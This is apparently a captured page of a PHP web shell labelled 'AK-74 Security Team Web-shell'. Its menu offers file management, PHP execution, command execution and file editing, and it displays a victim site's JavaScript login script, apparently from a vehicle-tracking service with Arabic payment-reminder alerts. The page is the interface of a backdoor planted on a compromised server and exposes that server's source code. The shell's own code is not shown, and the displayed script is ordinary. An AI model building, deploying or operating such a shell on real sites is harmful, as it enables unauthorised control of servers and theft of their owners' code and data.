.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
//################################################# // VARS //################################################# // language array/vars var la = []; //################################################# // END VARS //################################################# //################################################# // NOTIFY/CONFIRM DIALOGS/POPUPS //################################################# function notifyDialog(text) { // document.getElementById('dialog_notify_text').innerHTML = text; $('#dialog_notify').dialog('open'); } //################################################# // END NOTIFY/CONFIRM DIALOGS/POPUPS //################################################# function getUrlVars() { var vars = {}; var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function (m, key, value) { vars[key] = value; }); return vars; } function initGui() { // define dialogs $("#dialog_notify").dialog({ autoOpen: false, width: "auto", height: "auto", minHeight: "auto", modal: true, resizable: false, draggable: false, dialogClass: 'dialog-notify-titlebar' }); // checkboxes $(".custom-checkbox").click(function () { $(this).toggleClass('checked') }); // selects $(".select").multipleSelect({single: true}); } function connectLoad() { loadLanguage(function (response) {}); initGui(); // set language selectbox var cookie = getCookie("gs_language"); if (cookie != null && cookie != "") { document.getElementById("system_language").value = cookie; $("#system_language").multipleSelect('refresh'); } if (getUrlVars()["cmd"] == "recover") { if (getUrlVars()['token'] != undefined) { var token = getUrlVars()['token']; connectRecover(token); } } document.getElementById("username").focus(); document.getElementById("loading_panel").style.display = "none"; } function connectServer() { var server = document.getElementById("server").value; window.open(server, '_self', false); } function connectLogin() { var username = document.getElementById("username").value; var password = document.getElementById("password").value; var remember_me = document.getElementById("remember_me").checked; if ((username == '') || (password == '')) { return; } var data = { cmd: 'login', username: username, password: password, remember_me: remember_me, mobile: 'false' }; jQuery.ajax({ type: "POST", url: "func/fn_connect.php", data: data, success: function (result) { var obj=JSON.stringify(result); // var obj = JSON.parse(result); var result = obj.msg; // alert(obj.residual); var residual=obj.residual; // if (result == 'LOGIN_TRACKING2') { // alert('الرجاء مراجعة الاداره الماليه لتسديد الفواتير حتى لا يغلق الحساب آليا'); // window.open('tracking.php', '_self', false); // } if (result == 'LOGIN_TRACKING1') { if(residual !=0) alert('باقى مدة '+residual+' ايام على تسديد الفاتوره الخاصه بهذا الحساب'); else alert('سوف يتم اغلاق الحساب خلال نهاية البوم نظرا لوجود مستحقات ماليه '); window.open('tracking.php', '_self', false); // notifyDialog('باقى مدة '+ residual +' ايام على تسديد الفاتوره الخاصه بهذا الحساب'); } if (result == 'LOGIN_TRACKING') { window.open('tracking.php', '_self', false); } else if (result == 'LOGIN_CPANEL') { window.open('cpanel.php', '_self', false); } else if (result == 'ERROR_USERNAME_PASSWORD_INCORRECT') { alert('خطأ فى اسم الدخول او كلمة المرور'); notifyDialog(la['USERNAME_OR_PASSWORD_INCORRECT']); } else if (result == 'ERROR_ACCOUNT_LOCKED') { alert('تم غلق الحساب نظر لوجود فواتير مستحقه عليكم يرجى التواصل مع الحسابات على هذا الرقم 0556416144'); notifyDialog(la['THIS_ACCOUNT_IS_LOCKED']); } else if (result == 'ERROR_MANY_FAILED_LOGIN_ATTEMPTS') { notifyDialog(la['TOO_MANY_FAILED_LOGIN_ATTEMPTS']); } } }); } function connectRecoverURL() { var email = document.getElementById("rec_email").value; var token = document.getElementById("rec_token").value; if (!isEmailValid(email)) { notifyDialog(la['THIS_EMAIL_IS_NOT_VALID']); return; } var data = { cmd: 'recover_url', email: email, token: token }; jQuery.ajax({ type: "POST", url: "func/fn_connect.php", data: data, success: function (result) { if (result == 'OK') { notifyDialog(la['RECOVERY_LINK_SENT'] + ' ' + la['PLEASE_CHECK_YOUR_EMAIL']); } else if (result == 'ERROR_NOT_SENT') { notifyDialog(la['CANT_SEND_EMAIL'] + ' ' + la['CONTACT_ADMINISTRATOR']); } else if (result == 'ERROR_EMAIL_NOT_FOUND') { notifyDialog(la['THIS_EMAIL_IS_NOT_REGISTERED']); } else if (result == 'ERROR_MANY_LOGIN_RECOVERY_ATTEMPTS') { notifyDialog(la['TOO_MANY_LOGIN_RECOVERY_ATTEMPTS']); } } }); } function connectRecover(token) { var data = { cmd: 'recover', token: token }; jQuery.ajax({ type: "POST", url: "func/fn_connect.php", data: data, success: function (result) { if (result == 'OK') { notifyDialog(la['USERNAME_PASSWORD_SENT'] + ' ' + la['PLEASE_CHECK_YOUR_EMAIL']); } else if (result == 'ERROR_NOT_SENT') { notifyDialog(la['CANT_SEND_EMAIL'] + ' ' + la['PLEASE_CHECK_SERVER_EMAIL_SMTP_SETTINGS']); } else if (result == 'ERROR_EMAIL_NOT_FOUND') { notifyDialog(la['THIS_EMAIL_IS_NOT_REGISTERED']); } else if (result == 'ERROR_RECOVER_EXPIRED') { notifyDialog(la['RECOVERY_LINK_EXPIRED']); } } }); } function connectRegister() { var email = document.getElementById("reg_email").value; var token = document.getElementById("reg_token").value; if (!isEmailValid(email)) { notifyDialog(la['THIS_EMAIL_IS_NOT_VALID']); return; } var data = { cmd: 'register', email: email, token: token }; jQuery.ajax({ type: "POST", url: "func/fn_connect.php", data: data, success: function (result) { if (result == 'OK') { notifyDialog(la['REGISTRATION_SUCCESSFUL'] + ' ' + la['PLEASE_CHECK_YOUR_EMAIL']); } else if (result == 'ERROR_EMAIL_EXISTS') { notifyDialog(la['THIS_EMAIL_ALREADY_EXISTS']); } else if (result == 'ERROR_NOT_SENT') { notifyDialog(la['CANT_SEND_EMAIL'] + ' ' + la['PLEASE_CHECK_SERVER_EMAIL_SMTP_SETTINGS']); } } }); } function connectLogout() { var data = { cmd: 'logout' }; jQuery.ajax({ type: "POST", url: "func/fn_connect.php", data: data, success: function (result) { window.open(result, '_self', false); } }); }
Rename:
-